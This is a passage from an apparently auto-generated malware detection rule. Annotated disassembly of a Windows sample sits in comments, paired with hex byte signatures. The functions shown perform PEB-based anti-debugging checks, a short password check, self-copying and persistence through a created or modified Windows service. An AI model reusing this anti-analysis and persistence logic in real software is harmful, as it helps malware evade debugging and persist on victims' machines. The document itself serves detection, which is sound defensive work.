.text:0x00402d24 50 push eax + .text:0x00402d25 8d8d00f8ffff lea ecx,dword [ebp - 2048] + .text:0x00402d2b 51 push ecx + .text:0x00402d2c e84ffbffff call 0x00402880 ;sub_00402880(local2052) + .text:0x00402d31 83c408 add esp,8 + .text:0x00402d34 85c0 test eax,eax + .text:0x00402d36 7407 jz 0x00402d3f + .text:0x00402d38 b801000000 mov eax,1 + .text:0x00402d3d eb23 jmp 0x00402d62 + .text:0x00402d3f loc_00402d3f: [1 XREFS] + .text:0x00402d3f 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402d45 52 push edx + .text:0x00402d46 e8df0c0000 call 0x00403a2a ;_atoi(local1028) + .text:0x00402d4b 83c404 add esp,4 + .text:0x00402d4e 69c0e8030000 imul eax,eax,1000 + .text:0x00402d54 50 push eax + .text:0x00402d55 ff1538b04000 call dword [0x0040b038] ;kernel32.Sleep(0x4751ba98) + .text:0x00402d5b e965ffffff jmp 0x00402cc5 + .text:0x00402d60 loc_00402d60: [1 XREFS] + .text:0x00402d60 33c0 xor eax,eax + .text:0x00402d62 loc_00402d62: [2 XREFS] + .text:0x00402d62 5f pop edi + .text:0x00402d63 5e pop esi + .text:0x00402d64 5b pop ebx + .text:0x00402d65 8be5 mov esp,ebp + .text:0x00402d67 5d pop ebp + .text:0x00402d68 c3 ret + */ + $c40 = { 55 8B EC B8 0C 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? B9 01 00 00 00 85 C9 0F 84 ?? ?? ?? ?? 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 20 85 C0 74 ?? B8 01 00 00 00 EB ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 EB ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 69 C0 E8 03 00 00 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402d70@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402d70 + .text:0x00402d70 FUNC: int cdecl sub_00402d70( int arg0, ) [2 XREFS] + .text:0x00402d70 + .text:0x00402d70 Stack Variables: (offset from initial top of stack) + .text:0x00402d70 4: int arg0 + .text:0x00402d70 -8: int local8 + .text:0x00402d70 -12: int local12 + .text:0x00402d70 -16: int local16 + .text:0x00402d70 -20: int local20 + .text:0x00402d70 + .text:0x00402d70 55 push ebp + .text:0x00402d71 8bec mov ebp,esp + .text:0x00402d73 83ec10 sub esp,16 + .text:0x00402d76 53 push ebx + .text:0x00402d77 56 push esi + .text:0x00402d78 57 push edi + .text:0x00402d79 c745f400000000 mov dword [ebp - 12],0 + .text:0x00402d80 c745f000000000 mov dword [ebp - 16],0 + .text:0x00402d87 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402d8d 8a5802 mov bl,byte [eax + 2] + .text:0x00402d90 885df8 mov byte [ebp - 8],bl + .text:0x00402d93 0fbe45f8 movsx eax,byte [ebp - 8] + .text:0x00402d97 85c0 test eax,eax + .text:0x00402d99 7405 jz 0x00402da0 + .text:0x00402d9b e860e2ffff call 0x00401000 ;sub_00401000() + .text:0x00402da0 loc_00402da0: [1 XREFS] + .text:0x00402da0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402da6 8b4018 mov eax,dword [eax + 24] + .text:0x00402da9 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402dad 8945f4 mov dword [ebp - 12],eax + .text:0x00402db0 837df400 cmp dword [ebp - 12],0 + .text:0x00402db4 7405 jz 0x00402dbb + .text:0x00402db6 e845e2ffff call 0x00401000 ;sub_00401000() + .text:0x00402dbb loc_00402dbb: [1 XREFS] + .text:0x00402dbb 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402dc1 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402dc5 83e870 sub eax,112 + .text:0x00402dc8 8945f0 mov dword [ebp - 16],eax + .text:0x00402dcb 837df000 cmp dword [ebp - 16],0 + .text:0x00402dcf 7505 jnz 0x00402dd6 + .text:0x00402dd1 e82ae2ffff call 0x00401000 ;sub_00401000() + .text:0x00402dd6 loc_00402dd6: [1 XREFS] + .text:0x00402dd6 8b7d08 mov edi,dword [ebp + 8] + .text:0x00402dd9 83c9ff or ecx,0xffffffff + .text:0x00402ddc 33c0 xor eax,eax + .text:0x00402dde f2ae repnz: scasb + .text:0x00402de0 f7d1 not ecx + .text:0x00402de2 83c1ff add ecx,0xffffffff + .text:0x00402de5 83f904 cmp ecx,4 + .text:0x00402de8 7404 jz 0x00402dee + .text:0x00402dea 33c0 xor eax,eax + .text:0x00402dec eb74 jmp 0x00402e62 + .text:0x00402dee loc_00402dee: [1 XREFS] + .text:0x00402dee 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00402df1 8a11 mov dl,byte [ecx] + .text:0x00402df3 8855fc mov byte [ebp - 4],dl + .text:0x00402df6 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x00402dfa 83f861 cmp eax,97 + .text:0x00402dfd 7404 jz 0x00402e03 + .text:0x00402dff 33c0 xor eax,eax + .text:0x00402e01 eb5f jmp 0x00402e62 + .text:0x00402e03 loc_00402e03: [1 XREFS] + .text:0x00402e03 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00402e06 8a5101 mov dl,byte [ecx + 1] + .text:0x00402e09 8855fc mov byte [ebp - 4],dl + .text:0x00402e0c 8b4508 mov eax,dword [ebp + 8] + .text:0x00402e0f 8a4dfc mov cl,byte [ebp - 4] + .text:0x00402e12 2a08 sub cl,byte [eax] + .text:0x00402e14 884dfc mov byte [ebp - 4],cl + .text:0x00402e17 0fbe55fc movsx edx,byte [ebp - 4] + .text:0x00402e1b 83fa01 cmp edx,1 + .text:0x00402e1e 7404 jz 0x00402e24 + .text:0x00402e20 33c0 xor eax,eax + .text:0x00402e22 eb3e jmp 0x00402e62 + .text:0x00402e24 loc_00402e24: [1 XREFS] + .text:0x00402e24 8a45fc mov al,byte [ebp - 4] + .text:0x00402e27 b163 mov cl,99 + .text:0x00402e29 f6e9 imul cl + .text:0x00402e2b 8845fc mov byte [ebp - 4],al + .text:0x00402e2e 0fbe55fc movsx edx,byte [ebp - 4] + .text:0x00402e32 8b4508 mov eax,dword [ebp + 8] + .text:0x00402e35 0fbe4802 movsx ecx,byte [eax + 2] + .text:0x00402e39 3bd1 cmp edx,ecx + .text:0x00402e3b 7404 jz 0x00402e41 + .text:0x00402e3d 33c0 xor eax,eax + .text:0x00402e3f eb21 jmp 0x00402e62 + .text:0x00402e41 loc_00402e41: [1 XREFS] + .text:0x00402e41 8a55fc mov dl,byte [ebp - 4] + .text:0x00402e44 80c201 add dl,1 + .text:0x00402e47 8855fc mov byte [ebp - 4],dl + .text:0x00402e4a 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x00402e4e 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00402e51 0fbe5103 movsx edx,byte [ecx + 3] + .text:0x00402e55 3bc2 cmp eax,edx + .text:0x00402e57 7404 jz 0x00402e5d + .text:0x00402e59 33c0 xor eax,eax + .text:0x00402e5b eb05 jmp 0x00402e62 + .text:0x00402e5d loc_00402e5d: [1 XREFS] + .text:0x00402e5d b801000000 mov eax,1 + .text:0x00402e62 loc_00402e62: [5 XREFS] + .text:0x00402e62 5f pop edi + .text:0x00402e63 5e pop esi + .text:0x00402e64 5b pop ebx + .text:0x00402e65 8be5 mov esp,ebp + .text:0x00402e67 5d pop ebp + .text:0x00402e68 c3 ret + */ + $c41 = { 55 8B EC 83 EC 10 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 83 F9 04 74 ?? 33 C0 EB ?? 8B 4D ?? 8A 11 88 55 ?? 0F BE 45 ?? 83 F8 61 74 ?? 33 C0 EB ?? 8B 4D ?? 8A 51 ?? 88 55 ?? 8B 45 ?? 8A 4D ?? 2A 08 88 4D ?? 0F BE 55 ?? 83 FA 01 74 ?? 33 C0 EB ?? 8A 45 ?? B1 63 F6 E9 88 45 ?? 0F BE 55 ?? 8B 45 ?? 0F BE 48 ?? 3B D1 74 ?? 33 C0 EB ?? 8A 55 ?? 80 C2 01 88 55 ?? 0F BE 45 ?? 8B 4D ?? 0F BE 51 ?? 3B C2 74 ?? 33 C0 EB ?? B8 01 00 00 00 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402e70@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402e70 + .text:0x00402e70 FUNC: int cdecl sub_00402e70( int arg0, ) [8 XREFS] + .text:0x00402e70 + .text:0x00402e70 Stack Variables: (offset from initial top of stack) + .text:0x00402e70 4: int arg0 + .text:0x00402e70 -1028: int local1028 + .text:0x00402e70 -1032: int local1032 + .text:0x00402e70 -1036: int local1036 + .text:0x00402e70 -1040: int local1040 + .text:0x00402e70 + .text:0x00402e70 55 push ebp + .text:0x00402e71 8bec mov ebp,esp + .text:0x00402e73 81ec0c040000 sub esp,1036 + .text:0x00402e79 53 push ebx + .text:0x00402e7a 56 push esi + .text:0x00402e7b 57 push edi + .text:0x00402e7c c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x00402e86 c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x00402e90 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402e96 8a5802 mov bl,byte [eax + 2] + .text:0x00402e99 889dfcfbffff mov byte [ebp - 1028],bl + .text:0x00402e9f 0fbe85fcfbffff movsx eax,byte [ebp - 1028] + .text:0x00402ea6 85c0 test eax,eax + .text:0x00402ea8 7405 jz 0x00402eaf + .text:0x00402eaa e851e1ffff call 0x00401000 ;sub_00401000() + .text:0x00402eaf loc_00402eaf: [1 XREFS] + .text:0x00402eaf 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402eb5 8b4018 mov eax,dword [eax + 24] + .text:0x00402eb8 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402ebc 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x00402ec2 83bdf8fbffff00 cmp dword [ebp - 1032],0 + .text:0x00402ec9 7405 jz 0x00402ed0 + .text:0x00402ecb e830e1ffff call 0x00401000 ;sub_00401000() + .text:0x00402ed0 loc_00402ed0: [1 XREFS] + .text:0x00402ed0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402ed6 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402eda 83e870 sub eax,112 + .text:0x00402edd 8985f4fbffff mov dword [ebp - 1036],eax + .text:0x00402ee3 83bdf4fbffff00 cmp dword [ebp - 1036],0 + .text:0x00402eea 7505 jnz 0x00402ef1 + .text:0x00402eec e80fe1ffff call 0x00401000 ;sub_00401000() + .text:0x00402ef1 loc_00402ef1: [1 XREFS] + .text:0x00402ef1 6800040000 push 1024 + .text:0x00402ef6 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00402efc 51 push ecx + .text:0x00402efd 6a00 push 0 + .text:0x00402eff ff155cb04000 call dword [0x0040b05c] ;kernel32.GetModuleFileNameA(0,local1028,1024) + .text:0x00402f05 85c0 test eax,eax + .text:0x00402f07 7507 jnz 0x00402f10 + .text:0x00402f09 b801000000 mov eax,1 + .text:0x00402f0e eb1b jmp 0x00402f2b + .text:0x00402f10 loc_00402f10: [1 XREFS] + .text:0x00402f10 6a00 push 0 + .text:0x00402f12 8b5508 mov edx,dword [ebp + 8] + .text:0x00402f15 52 push edx + .text:0x00402f16 6a00 push 0 + .text:0x00402f18 6a00 push 0 + .text:0x00402f1a 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00402f20 50 push eax + .text:0x00402f21 e862120000 call 0x00404188 ;__splitpath(local1028,arg0,local1028,local1028,0,0,arg0) + .text:0x00402f26 83c414 add esp,20 + .text:0x00402f29 33c0 xor eax,eax + .text:0x00402f2b loc_00402f2b: [1 XREFS] + .text:0x00402f2b 5f pop edi + .text:0x00402f2c 5e pop esi + .text:0x00402f2d 5b pop ebx + .text:0x00402f2e 8be5 mov esp,ebp + .text:0x00402f30 5d pop ebp + .text:0x00402f31 c3 ret + */ + $c42 = { 55 8B EC 81 EC 0C 04 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 6A 00 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 6A 00 8B 55 ?? 52 6A 00 6A 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 14 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402f40@7faafc7e4a5c736ebfee6abbbc812d80 with 6 features: + - check for PEB NtGlobalFlag flag + - copy file + - create service + - modify service + - persist via Windows service + - query environment variable + .text:0x00402f40 + .text:0x00402f40 FUNC: int cdecl sub_00402f40( int arg0, ) [4 XREFS] + .text:0x00402f40 + .text:0x00402f40 Stack Variables: (offset from initial top of stack) + .text:0x00402f40 4: int arg0 + .text:0x00402f40 -1028: int local1028 + .text:0x00402f40 -1032: int local1032 + .text:0x00402f40 -2056: int local2056 + .text:0x00402f40 -3080: int local3080 + .text:0x00402f40 -4104: int local4104 + .text:0x00402f40 -5128: int local5128 + .text:0x00402f40 -5132: int local5132 + .text:0x00402f40 -5136: int local5136 + .text:0x00402f40 -5140: int local5140 + .text:0x00402f40 -5144: int local5144 + .text:0x00402f40 + .text:0x00402f40 55 push ebp + .text:0x00402f41 8bec mov ebp,esp + .text:0x00402f43 b814140000 mov eax,0x00001414 + .text:0x00402f48 e8230a0000 call 0x00403970 ;__alloca_probe() + .text:0x00402f4d 53 push ebx + .text:0x00402f4e 56 push esi + .text:0x00402f4f 57 push edi + .text:0x00402f50 c785f0ebffff0000 mov dword [ebp - 5136],0 + .text:0x00402f5a c785ecebffff0000 mov dword [ebp - 5140],0 + .text:0x00402f64 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402f6a 8a5802 mov bl,byte [eax + 2] + .text:0x00402f6d 889df4ebffff mov byte [ebp - 5132],bl + .text:0x00402f73 0fbe85f4ebffff movsx eax,byte [ebp - 5132] + .text:0x00402f7a 85c0 test eax,eax + .text:0x00402f7c 7405 jz 0x00402f83 + .text:0x00402f7e e87de0ffff call 0x00401000 ;sub_00401000() + .text:0x00402f83 loc_00402f83: [1 XREFS] + .text:0x00402f83 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402f89 8b4018 mov eax,dword [eax + 24] + .text:0x00402f8c 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402f90 8985f0ebffff mov dword [ebp - 5136],eax + .text:0x00402f96 83bdf0ebffff00 cmp dword [ebp - 5136],0 + .text:0x00402f9d 7405 jz 0x00402fa4 + .text:0x00402f9f e85ce0ffff call 0x00401000 ;sub_00401000() + .text:0x00402fa4 loc_00402fa4: [1 XREFS] + .text:0x00402fa4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402faa 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402fae 83e870 sub eax,112 + .text:0x00402fb1 8985ecebffff mov dword [ebp - 5140],eax + .text:0x00402fb7 83bdecebffff00 cmp dword [ebp - 5140],0 + .text:0x00402fbe 7505 jnz 0x00402fc5 + .text:0x00402fc0 e83be0ffff call 0x00401000 ;sub_00401000() + .text:0x00402fc5 loc_00402fc5: [1 XREFS] + .text:0x00402fc5 6800040000 push 1024 + .text:0x00402fca 8d8dfcebffff lea ecx,dword [ebp - 5124] + .text:0x00402fd0 51 push ecx + .text:0x00402fd1 e89afeffff call 0x00402e70 ;sub_00402e70(local5128) + .text:0x00402fd6 83c408 add esp,8 + .text:0x00402fd9 85c0 test eax,eax + .text:0x00402fdb 740a jz 0x00402fe7 + .text:0x00402fdd b801000000 mov eax,1 + .text:0x00402fe2 e9c3020000 jmp 0x004032aa + .text:0x00402fe7 loc_00402fe7: [1 XREFS] + .text:0x00402fe7 bf34c14000 mov edi,0x0040c134 + .text:0x00402fec 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402ff2 83c9ff or ecx,0xffffffff + .text:0x00402ff5 33c0 xor eax,eax + .text:0x00402ff7 f2ae repnz: scasb + .text:0x00402ff9 f7d1 not ecx + .text:0x00402ffb 2bf9 sub edi,ecx + .text:0x00402ffd 8bf7 mov esi,edi + .text:0x00402fff 8bc1 mov eax,ecx + .text:0x00403001 8bfa mov edi,edx + .text:0x00403003 c1e902 shr ecx,2 + .text:0x00403006 f3a5 rep: movsd + .text:0x00403008 8bc8 mov ecx,eax + .text:0x0040300a 83e103 and ecx,3 + .text:0x0040300d f3a4 rep: movsb + .text:0x0040300f 8dbdfcebffff lea edi,dword [ebp - 5124] + .text:0x00403015 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040301b 83c9ff or ecx,0xffffffff + .text:0x0040301e 33c0 xor eax,eax + .text:0x00403020 f2ae repnz: scasb + .text:0x00403022 f7d1 not ecx + .text:0x00403024 2bf9 sub edi,ecx + .text:0x00403026 8bf7 mov esi,edi + .text:0x00403028 8bd9 mov ebx,ecx + .text:0x0040302a 8bfa mov edi,edx + .text:0x0040302c 83c9ff or ecx,0xffffffff + .text:0x0040302f 33c0 xor eax,eax + .text:0x00403031 f2ae repnz: scasb + .text:0x00403033 83c7ff add edi,0xffffffff + .text:0x00403036 8bcb mov ecx,ebx + .text:0x00403038 c1e902 shr ecx,2 + .text:0x0040303b f3a5 rep: movsd + .text:0x0040303d 8bcb mov ecx,ebx + .text:0x0040303f 83e103 and ecx,3 + .text:0x00403042 f3a4 rep: movsb + .text:0x00403044 bf2cc14000 mov edi,0x0040c12c + .text:0x00403049 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040304f 83c9ff or ecx,0xffffffff + .text:0x00403052 33c0 xor eax,eax + .text:0x00403054 f2ae repnz: scasb + .text:0x00403056 f7d1 not ecx + .text:0x00403058 2bf9 sub edi,ecx + .text:0x0040305a 8bf7 mov esi,edi + .text:0x0040305c 8bd9 mov ebx,ecx + .text:0x0040305e 8bfa mov edi,edx + .text:0x00403060 83c9ff or ecx,0xffffffff + .text:0x00403063 33c0 xor eax,eax + .text:0x00403065 f2ae repnz: scasb + .text:0x00403067 83c7ff add edi,0xffffffff + .text:0x0040306a 8bcb mov ecx,ebx + .text:0x0040306c c1e902 shr ecx,2 + .text:0x0040306f f3a5 rep: movsd + .text:0x00403071 8bcb mov ecx,ebx + .text:0x00403073 83e103 and ecx,3 + .text:0x00403076 f3a4 rep: movsb + .text:0x00403078 683f000f00 push 0x000f003f + .text:0x0040307d 6a00 push 0 + .text:0x0040307f 6a00 push 0 + .text:0x00403081 ff1500b04000 call dword [0x0040b000] ;advapi32.OpenSCManagerA(0,0,0x000f003f) + .text:0x00403087 8985fcfbffff mov dword [ebp - 1028],eax + .text:0x0040308d 83bdfcfbffff00 cmp dword [ebp - 1028],0 + .text:0x00403094 750a jnz 0x004030a0 + .text:0x00403096 b801000000 mov eax,1 + .text:0x0040309b e90a020000 jmp 0x004032aa + .text:0x004030a0 loc_004030a0: [1 XREFS] + .text:0x004030a0 68ff010f00 push 0x000f01ff + .text:0x004030a5 8b4508 mov eax,dword [ebp + 8] + .text:0x004030a8 50 push eax + .text:0x004030a9 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x004030af 51 push ecx + .text:0x004030b0 ff1504b04000 call dword [0x0040b004] ;advapi32.OpenServiceA(advapi32.OpenSCManagerA(0,0,0x000f003f),arg0,0x000f01ff) + .text:0x004030b6 8985f8ebffff mov dword [ebp - 5128],eax + .text:0x004030bc 83bdf8ebffff00 cmp dword [ebp - 5128],0 + .text:0x004030c3 746d jz 0x00403132 + .text:0x004030c5 6a00 push 0 + .text:0x004030c7 6a00 push 0 + .text:0x004030c9 6a00 push 0 + .text:0x004030cb 6a00 push 0 + .text:0x004030cd 6a00 push 0 + .text:0x004030cf 6a00 push 0 + .text:0x004030d1 8d95fcf7ffff lea edx,dword [ebp - 2052] + .text:0x004030d7 52 push edx + .text:0x004030d8 6aff push 0xffffffff + .text:0x004030da 6a02 push 2 + .text:0x004030dc 6aff push 0xffffffff + .text:0x004030de 8b85f8ebffff mov eax,dword [ebp - 5128] + .text:0x004030e4 50 push eax + .text:0x004030e5 ff1508b04000 call dword [0x0040b008] ;advapi32.ChangeServiceConfigA(advapi32.OpenServiceA(<0x00403081>,arg0,0x000f01ff),0xffffffff,2,0xffffffff,local2056,0,0,0,0,0,0) + .text:0x004030eb 85c0 test eax,eax + .text:0x004030ed 7524 jnz 0x00403113 + .text:0x004030ef 8b8df8ebffff mov ecx,dword [ebp - 5128] + .text:0x004030f5 51 push ecx + .text:0x004030f6 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004030b0>) + .text:0x004030fc 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x00403102 52 push edx + .text:0x00403103 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403081>) + .text:0x00403109 b801000000 mov eax,1 + .text:0x0040310e e997010000 jmp 0x004032aa + .text:0x00403113 loc_00403113: [1 XREFS] + .text:0x00403113 8b85f8ebffff mov eax,dword [ebp - 5128] + .text:0x00403119 50 push eax + .text:0x0040311a ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004030b0>) + .text:0x00403120 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x00403126 51 push ecx + .text:0x00403127 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403081>) + .text:0x0040312d e9ce000000 jmp 0x00403200 + .text:0x00403132 loc_00403132: [1 XREFS] + .text:0x00403132 8b7d08 mov edi,dword [ebp + 8] + .text:0x00403135 8d95fcf3ffff lea edx,dword [ebp - 3076] + .text:0x0040313b 83c9ff or ecx,0xffffffff + .text:0x0040313e 33c0 xor eax,eax + .text:0x00403140 f2ae repnz: scasb + .text:0x00403142 f7d1 not ecx + .text:0x00403144 2bf9 sub edi,ecx + .text:0x00403146 8bf7 mov esi,edi + .text:0x00403148 8bc1 mov eax,ecx + .text:0x0040314a 8bfa mov edi,edx + .text:0x0040314c c1e902 shr ecx,2 + .text:0x0040314f f3a5 rep: movsd + .text:0x00403151 8bc8 mov ecx,eax + .text:0x00403153 83e103 and ecx,3 + .text:0x00403156 f3a4 rep: movsb + .text:0x00403158 bf18c14000 mov edi,0x0040c118 + .text:0x0040315d 8d95fcf3ffff lea edx,dword [ebp - 3076] + .text:0x00403163 83c9ff or ecx,0xffffffff + .text:0x00403166 33c0 xor eax,eax + .text:0x00403168 f2ae repnz: scasb + .text:0x0040316a f7d1 not ecx + .text:0x0040316c 2bf9 sub edi,ecx + .text:0x0040316e 8bf7 mov esi,edi + .text:0x00403170 8bd9 mov ebx,ecx + .text:0x00403172 8bfa mov edi,edx + .text:0x00403174 83c9ff or ecx,0xffffffff + .text:0x00403177 33c0 xor eax,eax + .text:0x00403179 f2ae repnz: scasb + .text:0x0040317b 83c7ff add edi,0xffffffff + .text:0x0040317e 8bcb mov ecx,ebx + .text:0x00403180 c1e902 shr ecx,2 + .text:0x00403183 f3a5 rep: movsd + .text:0x00403185 8bcb mov ecx,ebx + .text:0x00403187 83e103 and ecx,3 + .text:0x0040318a f3a4 rep: movsb + .text:0x0040318c 6a00 push 0 + .text:0x0040318e 6a00 push 0 + .text:0x00403190 6a00 push 0 + .text:0x00403192 6a00 push 0 + .text:0x00403194 6a00 push 0 + .text:0x00403196 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x0040319c 50 push eax + .text:0x0040319d 6a01 push 1 + .text:0x0040319f 6a02 push 2 + .text:0x004031a1 6a20 push 32 + .text:0x004031a3 68ff010f00 push 0x000f01ff + .text:0x004031a8 8d8dfcf3ffff lea ecx,dword [ebp - 3076] + .text:0x004031ae 51 push ecx + .text:0x004031af 8b5508 mov edx,dword [ebp + 8] + .text:0x004031b2 52 push edx + .text:0x004031b3 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x004031b9 50 push eax + .text:0x004031ba ff1510b04000 call dword [0x0040b010] ;advapi32.CreateServiceA(<0x00403081>,arg0,local3080,0x000f01ff,32,2,1,local1028,0,0,0,0,0) + .text:0x004031c0 8985f8ebffff mov dword [ebp - 5128],eax + .text:0x004031c6 83bdf8ebffff00 cmp dword [ebp - 5128],0 + .text:0x004031cd 7517 jnz 0x004031e6 + .text:0x004031cf 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x004031d5 51 push ecx + .text:0x004031d6 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403081>) + .text:0x004031dc b801000000 mov eax,1 + .text:0x004031e1 e9c4000000 jmp 0x004032aa + .text:0x004031e6 loc_004031e6: [1 XREFS] + .text:0x004031e6 8b95f8ebffff mov edx,dword [ebp - 5128] + .text:0x004031ec 52 push edx + .text:0x004031ed ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(advapi32.CreateServiceA(<0x00403081>,arg0,local3080,0x000f01ff,32,2,1,local1028,0,0,0,0,0)) + .text:0x004031f3 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x004031f9 50 push eax + .text:0x004031fa ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403081>) + .text:0x00403200 loc_00403200: [1 XREFS] + .text:0x00403200 6800040000 push 1024 + .text:0x00403205 8d8dfcf7ffff lea ecx,dword [ebp - 2052] + .text:0x0040320b 51 push ecx + .text:0x0040320c 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00403212 52 push edx + .text:0x00403213 ff1530b04000 call dword [0x0040b030] ;kernel32.ExpandEnvironmentStringsA(local1028,local2056,1024) + .text:0x00403219 85c0 test eax,eax + .text:0x0040321b 750a jnz 0x00403227 + .text:0x0040321d b801000000 mov eax,1 + .text:0x00403222 e983000000 jmp 0x004032aa + .text:0x00403227 loc_00403227: [1 XREFS] + .text:0x00403227 6800040000 push 1024 + .text:0x0040322c 8d85fcefffff lea eax,dword [ebp - 4100] + .text:0x00403232 50 push eax + .text:0x00403233 6a00 push 0 + .text:0x00403235 ff155cb04000 call dword [0x0040b05c] ;kernel32.GetModuleFileNameA(0,local4104,1024) + .text:0x0040323b 85c0 test eax,eax + .text:0x0040323d 7507 jnz 0x00403246 + .text:0x0040323f b801000000 mov eax,1 + .text:0x00403244 eb64 jmp 0x004032aa + .text:0x00403246 loc_00403246: [1 XREFS] + .text:0x00403246 6a00 push 0 + .text:0x00403248 8d8dfcf7ffff lea ecx,dword [ebp - 2052] + .text:0x0040324e 51 push ecx + .text:0x0040324f 8d95fcefffff lea edx,dword [ebp - 4100] + .text:0x00403255 52 push edx + .text:0x00403256 ff1534b04000 call dword [0x0040b034] ;kernel32.CopyFileA(local4104,local2056,0) + .text:0x0040325c 85c0 test eax,eax + .text:0x0040325e 7507 jnz 0x00403267 + .text:0x00403260 b801000000 mov eax,1 + .text:0x00403265 eb43 jmp 0x004032aa + .text:0x00403267 loc_00403267: [1 XREFS] + .text:0x00403267 8d85fcf7ffff lea eax,dword [ebp - 2052] + .text:0x0040326d 50 push eax + .text:0x0040326e e83de7ffff call 0x004019b0 ;sub_004019b0(local2056) + .text:0x00403273 83c404 add esp,4 + .text:0x00403276 85c0 test eax,eax + .text:0x00403278 7407 jz 0x00403281 + .text:0x0040327a b801000000 mov eax,1 + .text:0x0040327f eb29 jmp 0x004032aa + .text:0x00403281 loc_00403281: [1 